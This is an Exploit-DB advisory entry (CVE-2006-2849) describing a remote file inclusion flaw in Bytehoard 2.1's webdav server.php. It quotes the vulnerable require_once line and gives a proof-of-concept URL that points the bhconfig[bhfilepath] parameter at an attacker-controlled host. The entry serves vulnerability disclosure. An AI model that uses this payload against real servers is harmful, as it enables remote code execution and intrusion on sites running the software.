Bytehoard 2.1 - server.php Remote File Include Vulnerability

2006-06-01T00:00:00
ID EDB-ID:1860
Type exploitdb
Reporter beford
Modified 2006-06-01T00:00:00

Description

Bytehoard 2.1 (server.php) Remote File Include Vulnerability. CVE-2006-2849. Webapps exploit for php platform

                                        
                                            Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]


http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker

# milw0rm.com [2006-06-01]